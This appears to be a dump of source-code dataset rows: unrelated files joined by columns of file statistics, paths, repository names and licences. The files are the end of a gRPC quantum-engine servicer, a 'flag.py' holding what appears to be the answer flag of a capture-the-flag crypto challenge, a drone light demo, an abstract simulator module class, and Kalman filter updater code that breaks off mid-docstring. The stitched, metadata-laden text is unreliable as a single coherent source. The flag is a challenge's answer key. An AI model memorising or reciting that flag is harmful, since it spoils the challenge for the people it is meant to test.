'DeleteQuantumProgram': grpc.unary_unary_rpc_method_handler(
servicer.DeleteQuantumProgram,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.DeleteQuantumProgramRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'UpdateQuantumProgram': grpc.unary_unary_rpc_method_handler(
servicer.UpdateQuantumProgram,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.UpdateQuantumProgramRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumProgram.SerializeToString,
),
'CreateQuantumJob': grpc.unary_unary_rpc_method_handler(
servicer.CreateQuantumJob,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.CreateQuantumJobRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumJob.SerializeToString,
),
'GetQuantumJob': grpc.unary_unary_rpc_method_handler(
servicer.GetQuantumJob,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.GetQuantumJobRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumJob.SerializeToString,
),
'ListQuantumJobs': grpc.unary_unary_rpc_method_handler(
servicer.ListQuantumJobs,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumJobsRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumJobsResponse.SerializeToString,
),
'DeleteQuantumJob': grpc.unary_unary_rpc_method_handler(
servicer.DeleteQuantumJob,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.DeleteQuantumJobRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'UpdateQuantumJob': grpc.unary_unary_rpc_method_handler(
servicer.UpdateQuantumJob,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.UpdateQuantumJobRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumJob.SerializeToString,
),
'CancelQuantumJob': grpc.unary_unary_rpc_method_handler(
servicer.CancelQuantumJob,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.CancelQuantumJobRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'ListQuantumJobEvents': grpc.unary_unary_rpc_method_handler(
servicer.ListQuantumJobEvents,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumJobEventsRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumJobEventsResponse.SerializeToString,
),
'GetQuantumResult': grpc.unary_unary_rpc_method_handler(
servicer.GetQuantumResult,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.GetQuantumResultRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumResult.SerializeToString,
),
'ListQuantumProcessors': grpc.unary_unary_rpc_method_handler(
servicer.ListQuantumProcessors,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumProcessorsRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumProcessorsResponse.SerializeToString,
),
'GetQuantumProcessor': grpc.unary_unary_rpc_method_handler(
servicer.GetQuantumProcessor,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.GetQuantumProcessorRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumProcessor.SerializeToString,
),
'ListQuantumCalibrations': grpc.unary_unary_rpc_method_handler(
servicer.ListQuantumCalibrations,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumCalibrationsRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumCalibrationsResponse.SerializeToString,
),
'GetQuantumCalibration': grpc.unary_unary_rpc_method_handler(
servicer.GetQuantumCalibration,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.GetQuantumCalibrationRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumCalibration.SerializeToString,
),
'CreateQuantumReservation': grpc.unary_unary_rpc_method_handler(
servicer.CreateQuantumReservation,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.CreateQuantumReservationRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumReservation.SerializeToString,
),
'CancelQuantumReservation': grpc.unary_unary_rpc_method_handler(
servicer.CancelQuantumReservation,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.CancelQuantumReservationRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumReservation.SerializeToString,
),
'DeleteQuantumReservation': grpc.unary_unary_rpc_method_handler(
servicer.DeleteQuantumReservation,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.DeleteQuantumReservationRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'GetQuantumReservation': grpc.unary_unary_rpc_method_handler(
servicer.GetQuantumReservation,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.GetQuantumReservationRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumReservation.SerializeToString,
),
'ListQuantumReservations': grpc.unary_unary_rpc_method_handler(
servicer.ListQuantumReservations,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumReservationsRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumReservationsResponse.SerializeToString,
),
'UpdateQuantumReservation': grpc.unary_unary_rpc_method_handler(
servicer.UpdateQuantumReservation,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.UpdateQuantumReservationRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumReservation.SerializeToString,
),
'QuantumRunStream': grpc.stream_stream_rpc_method_handler(
servicer.QuantumRunStream,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.QuantumRunStreamRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.QuantumRunStreamResponse.SerializeToString,
),
'ListQuantumReservationGrants': grpc.unary_unary_rpc_method_handler(
servicer.ListQuantumReservationGrants,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumReservationGrantsRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumReservationGrantsResponse.SerializeToString,
),
'ReallocateQuantumReservationGrant': grpc.unary_unary_rpc_method_handler(
servicer.ReallocateQuantumReservationGrant,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ReallocateQuantumReservationGrantRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_quantum__pb2.QuantumReservationGrant.SerializeToString,
),
'ListQuantumReservationBudgets': grpc.unary_unary_rpc_method_handler(
servicer.ListQuantumReservationBudgets,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumReservationBudgetsRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumReservationBudgetsResponse.SerializeToString,
),
'ListQuantumTimeSlots': grpc.unary_unary_rpc_method_handler(
servicer.ListQuantumTimeSlots,
request_deserializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumTimeSlotsRequest.FromString,
response_serializer=google_dot_cloud_dot_quantum__v1alpha1_dot_proto_dot_engine__pb2.ListQuantumTimeSlotsResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.cloud.quantum.v1alpha1.QuantumEngineService', rpc_method_handlers
)
server.add_generic_rpc_handlers((generic_handler,))
| 63.075665
| 155
| 0.779179
| 2,937
| 30,844
| 7.617978
| 0.046987
| 0.091848
| 0.066327
| 0.08054
| 0.830294
| 0.826182
| 0.824931
| 0.779074
| 0.703048
| 0.6984
| 0
| 0.015083
| 0.157373
| 30,844
| 488
| 156
| 63.204918
| 0.845787
| 0.005868
| 0
| 0.346341
| 1
| 0
| 0.129399
| 0.077961
| 0
| 0
| 0
| 0
| 0
| 1
| 0.073171
| false
| 0
| 0.009756
| 0
| 0.087805
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4491be1bb7fb7c012de5512d687381c456a0285e
| 47
|
py
|
Python
|
Crypto-easyRSA/flag.py
|
JSW2020/hsctf-2019-freshmen
|
5282d6d51153aadd62f42673aa3d487f8d7ef45b
|
[
"MIT"
] | 16
|
2019-12-09T15:53:08.000Z
|
2021-12-07T00:34:30.000Z
|
Crypto-easyRSA/flag.py
|
JSW2020/hsctf-2019-freshmen
|
5282d6d51153aadd62f42673aa3d487f8d7ef45b
|
[
"MIT"
] | null | null | null |
Crypto-easyRSA/flag.py
|
JSW2020/hsctf-2019-freshmen
|
5282d6d51153aadd62f42673aa3d487f8d7ef45b
|
[
"MIT"
] | 7
|
2019-12-09T11:53:52.000Z
|
2021-11-14T04:09:04.000Z
|
flag = 'flag{a9f82b70bda82070bdefadad4bb1c2d0}'
| 47
| 47
| 0.851064
| 3
| 47
| 13.333333
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.311111
| 0.042553
| 47
| 1
| 47
| 47
| 0.577778
| 0
| 0
| 0
| 0
| 0
| 0.791667
| 0.791667
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
924c682945b67d2c52f37b2f277e6ff2930b5582
| 2,173
|
py
|
Python
|
10_light/eg_10_02_light_manual_color_flag.py
|
byrobot-python/e_drone_examples
|
fca3ef69f45299f0e80df52ac303e2a1388b2b61
|
[
"MIT"
] | null | null | null |
10_light/eg_10_02_light_manual_color_flag.py
|
byrobot-python/e_drone_examples
|
fca3ef69f45299f0e80df52ac303e2a1388b2b61
|
[
"MIT"
] | null | null | null |
10_light/eg_10_02_light_manual_color_flag.py
|
byrobot-python/e_drone_examples
|
fca3ef69f45299f0e80df52ac303e2a1388b2b61
|
[
"MIT"
] | null | null | null |
import random
from time import sleep
from e_drone.drone import *
from e_drone.protocol import *
if __name__ == '__main__':
drone = Drone()
drone.open()
drone.send_light_manual(DeviceType.CONTROLLER, 0xFF, 0)
sleep(1)
drone.send_light_manual(DeviceType.CONTROLLER, LightFlagsController.BODY_RED.value, 10); sleep(1)
drone.send_light_manual(DeviceType.CONTROLLER, LightFlagsController.BODY_RED.value, 100); sleep(1)
drone.send_light_manual(DeviceType.CONTROLLER, LightFlagsController.BODY_RED.value, 0); sleep(1)
drone.send_light_manual(DeviceType.CONTROLLER, LightFlagsController.BODY_GREEN.value, 10); sleep(1)
drone.send_light_manual(DeviceType.CONTROLLER, LightFlagsController.BODY_GREEN.value, 100); sleep(1)
drone.send_light_manual(DeviceType.CONTROLLER, LightFlagsController.BODY_GREEN.value, 0); sleep(1)
drone.send_light_manual(DeviceType.CONTROLLER, LightFlagsController.BODY_BLUE.value, 10); sleep(1)
drone.send_light_manual(DeviceType.CONTROLLER, LightFlagsController.BODY_BLUE.value, 100); sleep(1)
drone.send_light_manual(DeviceType.CONTROLLER, LightFlagsController.BODY_BLUE.value, 0); sleep(1)
drone.send_light_manual(DeviceType.DRONE, LightFlagsDrone.BODY_RED.value, 10); sleep(1)
drone.send_light_manual(DeviceType.DRONE, LightFlagsDrone.BODY_RED.value, 100); sleep(1)
drone.send_light_manual(DeviceType.DRONE, LightFlagsDrone.BODY_RED.value, 0); sleep(1)
drone.send_light_manual(DeviceType.DRONE, LightFlagsDrone.BODY_GREEN.value, 10); sleep(1)
drone.send_light_manual(DeviceType.DRONE, LightFlagsDrone.BODY_GREEN.value, 100); sleep(1)
drone.send_light_manual(DeviceType.DRONE, LightFlagsDrone.BODY_GREEN.value, 0); sleep(1)
drone.send_light_manual(DeviceType.DRONE, LightFlagsDrone.BODY_BLUE.value, 10); sleep(1)
drone.send_light_manual(DeviceType.DRONE, LightFlagsDrone.BODY_BLUE.value, 100); sleep(1)
drone.send_light_manual(DeviceType.DRONE, LightFlagsDrone.BODY_BLUE.value, 0); sleep(1)
drone.close()
| 54.325
| 109
| 0.736309
| 269
| 2,173
| 5.702602
| 0.111524
| 0.111473
| 0.173403
| 0.247718
| 0.925684
| 0.925684
| 0.899609
| 0.891786
| 0.891786
| 0.891786
| 0
| 0.03125
| 0.160607
| 2,173
| 40
| 110
| 54.325
| 0.809759
| 0
| 0
| 0
| 0
| 0
| 0.003747
| 0
| 0
| 0
| 0.001874
| 0
| 0
| 1
| 0
| false
| 0
| 0.142857
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
926680b7bf49888029c1cffbb51cd5a14959195c
| 1,473
|
py
|
Python
|
aqopa/module/__init__.py
|
lukaszkurantdev/AQoPA
|
997d8a16a07050781d5d4df0e18c0a4337eb815c
|
[
"BSD-3-Clause"
] | 2
|
2016-06-10T19:58:02.000Z
|
2020-04-08T17:32:05.000Z
|
aqopa/module/__init__.py
|
lukaszkurantdev/AQoPA
|
997d8a16a07050781d5d4df0e18c0a4337eb815c
|
[
"BSD-3-Clause"
] | null | null | null |
aqopa/module/__init__.py
|
lukaszkurantdev/AQoPA
|
997d8a16a07050781d5d4df0e18c0a4337eb815c
|
[
"BSD-3-Clause"
] | 2
|
2015-05-07T08:02:07.000Z
|
2021-02-14T10:55:09.000Z
|
#Module abstract
class Module():
"""
Abstract class of module
"""
def get_gui(self):
"""
Method returns class that is used by GUI version of AQoPA.
"""
return None
def extend_model_parser(self, parser):
"""
Method is called before parsing the qopml model file.
Module can extend parser and add tokens, rules, etc.
Method returns parser.
"""
return parser
def extend_metrics_parser(self, parser):
"""
Method is called before parsing the qopml metrics file.
Module can extend parser and add tokens, rules, etc.
Method returns parser.
"""
return parser
def extend_config_parser(self, parser):
"""
Method is called before parsing the qopml config file.
Module can extend parser and add tokens, rules, etc.
Method returns parser.
"""
return parser
def install_console(self, simulator):
"""
Method is called before running simulation in console mode.
Module installs itself in simulator.
It can register hooks, executors, etc.
"""
return simulator
def install_gui(self, simulator):
"""
Method is called before running simulation in GUI mode.
Module installs itself in simulator.
It can register hooks, executors, etc.
"""
return simulator
| 28.326923
| 67
| 0.592668
| 166
| 1,473
| 5.204819
| 0.289157
| 0.046296
| 0.081019
| 0.115741
| 0.770833
| 0.770833
| 0.770833
| 0.770833
| 0.770833
| 0.650463
| 0
| 0
| 0.342838
| 1,473
| 52
| 68
| 28.326923
| 0.892562
| 0.517312
| 0
| 0.384615
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.461538
| false
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
929cccf3860d36321dfd4c89394869f09f1084e0
| 34,454
|
py
|
Python
|
stonesoup/updater/kalman.py
|
GSORF/Stone-Soup
|
0aa730929fa6a1630a5279516c3377867e49b9b9
|
[
"MIT"
] | 1
|
2021-04-13T11:47:42.000Z
|
2021-04-13T11:47:42.000Z
|
stonesoup/updater/kalman.py
|
GSORF/Stone-Soup
|
0aa730929fa6a1630a5279516c3377867e49b9b9
|
[
"MIT"
] | null | null | null |
stonesoup/updater/kalman.py
|
GSORF/Stone-Soup
|
0aa730929fa6a1630a5279516c3377867e49b9b9
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import numpy as np
from functools import lru_cache
from .base import Updater
from ..base import Property
from ..types.hypothesis import SingleHypothesis
from ..types.prediction import GaussianMeasurementPrediction
from ..types.update import GaussianStateUpdate
from ..functions import gauss2sigma, unscented_transform
class KalmanUpdater(Updater):
"""Simple Kalman Updater
Perform measurement update step in the standard Kalman Filter.
"""
@lru_cache()
def get_measurement_prediction(self, state_prediction,
measurement_model=None, **kwargs):
"""Kalman Filter measurement prediction step
Parameters
----------
state_prediction : :class:`~.GaussianStatePrediction`
A predicted state object
measurement_model: :class:`~.MeasurementModel`, optional
The measurement model used to generate the measurement prediction.\
Should be used in cases where the measurement model is dependent\
on the received measurement.\
(the default is ``None``, in which case the updater will use the\
measurement model specified on initialisation)
Returns
-------
: :class:`~.GaussianMeasurementPrediction`
The measurement prediction
"""
# Measurement model parameters
if measurement_model is None:
measurement_model = self.measurement_model
measurement_matrix, measurement_noise_covar = \
self._extract_model_parameters(measurement_model)
meas_pred_mean, meas_pred_covar, cross_covar = \
self.get_measurement_prediction_lowlevel(state_prediction.mean,
state_prediction.covar,
measurement_matrix,
measurement_noise_covar)
return GaussianMeasurementPrediction(meas_pred_mean, meas_pred_covar,
state_prediction.timestamp,
cross_covar)
def update(self, hypothesis, **kwargs):
"""Kalman Filter update step
Parameters
----------
hypothesis : :class:`~.Hypothesis`
Hypothesis with predicted state and associated detection used for
updating.
Returns
-------
: :class:`~.GaussianStateUpaate`
The computed state posterior
"""
# Extract model parameters
measurement_matrix, measurement_noise_covar = \
self._extract_model_parameters(self.measurement_model,
hypothesis.measurement)
# If no measurement prediction is provided with hypothesis
if hypothesis.measurement_prediction is None:
# Perform full update step
posterior_mean, posterior_covar, meas_pred_mean,\
meas_pred_covar, cross_covar, _ = \
self.update_lowlevel(
hypothesis.prediction.mean,
hypothesis.prediction.covar,
measurement_matrix,
measurement_noise_covar,
hypothesis.measurement.state_vector
)
# Augment hypothesis with measurement prediction
hypothesis = SingleHypothesis(hypothesis.prediction,
hypothesis.measurement,
GaussianMeasurementPrediction(
meas_pred_mean, meas_pred_covar,
hypothesis.prediction.timestamp,
cross_covar)
)
else:
# Otherwise, utilise the provided measurement prediction
posterior_mean, posterior_covar, _ = \
self.update_on_measurement_prediction(
hypothesis.prediction.mean,
hypothesis.prediction.covar,
hypothesis.measurement.state_vector,
hypothesis.measurement_prediction.mean,
hypothesis.measurement_prediction.covar,
hypothesis.measurement_prediction.cross_covar,
measurement_matrix,
measurement_noise_covar
)
return GaussianStateUpdate(posterior_mean,
posterior_covar,
hypothesis,
hypothesis.measurement.timestamp)
@staticmethod
def update_lowlevel(x_pred, P_pred, H, R, y):
"""Low level Kalman Filter update
Parameters
----------
x_pred: :class:`numpy.ndarray` of shape (Ns,1)
The predicted state mean
P_pred: :class:`numpy.ndarray` of shape (Ns,Ns)
The predicted state covariance
H : :class:`numpy.ndarray` of shape (Nm,Ns)
The measurement model matrix
R : :class:`numpy.ndarray` of shape (Nm,Nm)
The measurement noise covariance matrix
y : :class:`numpy.ndarray` of shape (Nm,1)
The measurement vector
Returns
-------
: :class:`numpy.ndarray` of shape (Ns,1)
The computed posterior state mean
: :class:`numpy.ndarray` of shape (Ns,Ns)
The computed posterior state covariance
: :class:`numpy.ndarray` of shape (Ns,Nm)
The computed Kalman gain
"""
y_pred, S, Pxy = \
KalmanUpdater.get_measurement_prediction_lowlevel(x_pred,
P_pred,
H, R)
x_post, P_post, K = \
KalmanUpdater.update_on_measurement_prediction(x_pred, P_pred,
y, y_pred, S,
Pxy, H, R)
return x_post, P_post, y_pred, S, Pxy, K
@staticmethod
def get_measurement_prediction_lowlevel(x_pred, P_pred, H, R):
"""Low level Kalman Filter measurement prediction
Parameters
----------
x_pred: :class:`numpy.ndarray` of shape (Ns,1)
The predicted state mean
P_pred: :class:`numpy.ndarray` of shape (Ns,Ns)
The predicted state covariance
H : :class:`numpy.ndarray` of shape (Nm,Ns)
The measurement model matrix
R : :class:`numpy.ndarray` of shape (Nm,Nm)
The measurement noise covariance matrix
Returns
-------
: :class:`numpy.ndarray` of shape (Nm,1)
The predicted measurement mean
: :class:`numpy.ndarray` of shape (Nm,Nm)
The predicted measurement noise (innovation) covariance matrix
: :class:`numpy.ndarray` of shape (Ns,Nm), optional
The state-to-measurement cross covariance
"""
y_pred = H@x_pred
S = H@P_pred@H.T + R
Pxy = P_pred@H.T
return y_pred, S, Pxy
@staticmethod
def update_on_measurement_prediction(x_pred, P_pred, y,
y_pred, S, Pxy, H=None, R=None):
"""Low level Kalman Filter update, based on a measurement prediction
Parameters
----------
x_pred: :class:`numpy.ndarray` of shape (Ns,1)
The predicted state mean
P_pred: :class:`numpy.ndarray` of shape (Ns,Ns)
The predicted state covariance
y : :class:`numpy.ndarray` of shape (Nm,1)
The measurement vector
y_pred: :class:`numpy.ndarray` of shape (Nm,1)
The predicted measurement mean
S: :class:`numpy.ndarray` of shape (Nm,Nm)
The predicted measurement noise (innovation) covariance matrix
Pxy: :class:`numpy.ndarray` of shape (Ns,Nm), optional
The state-to-measurement cross covariance
H: :class:`numpy.ndarray` of shape (Nm,Nm), optional
The measurement model matrix. If both `H` and `R` are provided
then the update will be performed based on the slower, but more
numerically stable, "Joseph form" update equation:
:math:`P_{k|k} = (I-K_kH_k)P_{k|k-1}(I-K_kH_k)^T + K_kR_kK_k^T`
(default is `None`)
R: :class:`numpy.ndarray` of shape (Nm,Nm), optional
The measurement model matrix. See information for `H` above.
Returns
-------
: :class:`numpy.ndarray` of shape (Ns,1)
The computed posterior state mean
: :class:`numpy.ndarray` of shape (Ns,Ns)
The computed posterior state covariance
: :class:`numpy.ndarray` of shape (Ns,Nm)
The computed Kalman gain
"""
K = Pxy@np.linalg.pinv(S)
x_post = x_pred + K@(y-y_pred)
if(H is not None and R is not None):
# P = (I-KH)P(I-KH)' + KRK' is more numerically stable
# and works for non-optimal K vs the equation
# P = (I-KH)P usually seen in the literature.
ndim_state = x_pred.shape[0]
I_KH = np.eye(ndim_state) - K@H
P_post = I_KH@P_pred@I_KH.T + K@R@K.T
elif(H is not None):
ndim_state = x_pred.shape[0]
P_post = (np.eye(ndim_state) - K@H)@P_pred
else:
P_post = P_pred - K@Pxy.T
P_post = (P_post+P_post.T)/2
return x_post, P_post, K
@staticmethod
def _extract_model_parameters(measurement_model, measurement=None,
**kwargs):
"""Extract measurement model parameters
Parameters
----------
measurement_model: :class:`~.MeasurementModel`
A measurement model whose parameters are to be extracted
measurement : :class:`~.Detection`, optional
If provided and `measurement.measurement_model` is not `None`,\
then its parameters will be returned instead\
(the default is `None`, in which case `self.measurement_model`'s\
parameters will be returned)
Returns
-------
: :class:`numpy.ndarray` of shape (Nm,Nm)
The measurement model transformation matrix
: :class:`numpy.ndarray` of shape (Nm,Nm)
The measurement model covariance matrix
"""
if(measurement is not None
and measurement.measurement_model is not None):
measurement_matrix = measurement.measurement_model.matrix(**kwargs)
measurement_noise_covar = measurement.measurement_model.covar(
**kwargs)
else:
measurement_matrix = measurement_model.matrix(**kwargs)
measurement_noise_covar = measurement_model.covar(**kwargs)
return measurement_matrix, measurement_noise_covar
class ExtendedKalmanUpdater(KalmanUpdater):
"""Extended Kalman Updater
Perform measurement update step in the Extended Kalman Filter.
"""
@lru_cache()
def get_measurement_prediction(self, state_prediction,
measurement_model=None, **kwargs):
"""Extended Kalman Filter measurement prediction step
Parameters
----------
state_prediction : :class:`~.GaussianStatePrediction`
A predicted state object
measurement_model: :class:`~.MeasurementModel`, optional
The measurement model used to generate the measurement prediction.\
Should be used in cases where the measurement model is dependent\
on the received measurement.\
(the default is ``None``, in which case the updater will use the\
measurement model specified on initialisation)
Returns
-------
: :class:`~.GaussianMeasurementPrediction`
The measurement prediction
"""
# Measurement model parameters
if measurement_model is None:
measurement_model = self.measurement_model
measurement_matrix, measurement_noise_covar, measurement_function = \
self._extract_model_parameters(measurement_model,
state_prediction.state_vector)
meas_pred_mean, meas_pred_covar, cross_covar = \
self.get_measurement_prediction_lowlevel(state_prediction.mean,
state_prediction.covar,
measurement_function,
measurement_matrix,
measurement_noise_covar)
return GaussianMeasurementPrediction(meas_pred_mean, meas_pred_covar,
state_prediction.timestamp,
cross_covar)
def update(self, hypothesis, **kwargs):
""" Extended Kalman Filter update step
Parameters
----------
hypothesis : :class:`~.Hypothesis`
Hypothesis with predicted state and associated detection used for
updating.
Returns
-------
: :class:`~.GaussianState`
The state posterior
"""
# Extract model parameters
measurement_matrix, measurement_noise_covar, measurement_function = \
self._extract_model_parameters(self.measurement_model,
hypothesis.prediction.state_vector,
hypothesis.measurement)
# If no measurement prediction is provided with hypothesis
if hypothesis.measurement_prediction is None:
# Perform full update step
posterior_mean, posterior_covar, meas_pred_mean,\
meas_pred_covar, cross_covar, _ = \
self.update_lowlevel(
hypothesis.prediction.mean,
hypothesis.prediction.covar,
measurement_function,
measurement_matrix,
measurement_noise_covar,
hypothesis.measurement.state_vector
)
# Augment hypothesis with measurement prediction
hypothesis = SingleHypothesis(hypothesis.prediction,
hypothesis.measurement,
GaussianMeasurementPrediction(
meas_pred_mean, meas_pred_covar,
hypothesis.prediction.timestamp,
cross_covar)
)
else:
posterior_mean, posterior_covar, _ = \
self.update_on_measurement_prediction(
hypothesis.prediction.mean,
hypothesis.prediction.covar,
hypothesis.measurement.state_vector,
hypothesis.measurement_prediction.mean,
hypothesis.measurement_prediction.covar,
hypothesis.measurement_prediction.cross_covar,
measurement_matrix,
measurement_noise_covar
)
return GaussianStateUpdate(posterior_mean,
posterior_covar,
hypothesis,
hypothesis.measurement.timestamp)
@staticmethod
def update_lowlevel(x_pred, P_pred, h, H, R, y):
"""Low level Extended Kalman Filter update
Parameters
----------
x_pred: :class:`numpy.ndarray` of shape (Ns,1)
The predicted state mean
P_pred: :class:`numpy.ndarray` of shape (Ns,Ns)
The predicted state covariance
h : function handle
The (non-linear) measurement model function
Must be of the form "y = fun(x)"
H : :class:`numpy.ndarray` of shape (Nm,Ns)
The measurement model jacobian matrix
R : :class:`numpy.ndarray` of shape (Nm,Nm)
The measurement noise covariance matrix
y : :class:`numpy.ndarray` of shape (Nm,1)
The measurement vector
Returns
-------
: :class:`numpy.ndarray` of shape (Ns,1)
The computed posterior state mean
: :class:`numpy.ndarray` of shape (Ns,Ns)
The computed posterior state covariance
: :class:`numpy.ndarray` of shape (Ns,Nm)
The computed Kalman gain
"""
y_pred, S, Pxy = \
ExtendedKalmanUpdater.get_measurement_prediction_lowlevel(x_pred,
P_pred,
h,
H,
R)
x_post, P_post, K = \
ExtendedKalmanUpdater.update_on_measurement_prediction(x_pred,
P_pred,
y,
y_pred,
S,
Pxy,
H,
R)
return x_post, P_post, y_pred, S, Pxy, K
@staticmethod
def get_measurement_prediction_lowlevel(x_pred, P_pred, h, H, R):
"""Low level Extended Kalman Filter measurement prediction
Parameters
----------
x_pred: :class:`numpy.ndarray` of shape (Ns,1)
The predicted state mean
P_pred: :class:`numpy.ndarray` of shape (Ns,Ns)
The predicted state covariance
h : function handle
The (non-linear) measurement model function
Must be of the form "y = fun(x)"
H : :class:`numpy.ndarray` of shape (Nm,Ns)
The measurement model jacobian matrix
R : :class:`numpy.ndarray` of shape (Nm,Nm)
The measurement noise covariance matrix
Returns
-------
: :class:`numpy.ndarray` of shape (Nm,1)
The predicted measurement mean
: :class:`numpy.ndarray` of shape (Nm,Nm)
The predicted measurement noise (innovation) covariance matrix
: :class:`numpy.ndarray` of shape (Ns,Nm), optional
The state-to-measurement cross covariance
"""
y_pred = h(x_pred)
S = H@P_pred@H.T + R
Pxy = P_pred@H.T
return y_pred, S, Pxy
@staticmethod
def update_on_measurement_prediction(x_pred, P_pred, y,
y_pred, S, Pxy, H=None, R=None):
"""Low level Extended Kalman Filter update, based on a measurement\
prediction
Parameters
----------
x_pred: :class:`numpy.ndarray` of shape (Ns,1)
The predicted state mean
P_pred: :class:`numpy.ndarray` of shape (Ns,Ns)
The predicted state covariance
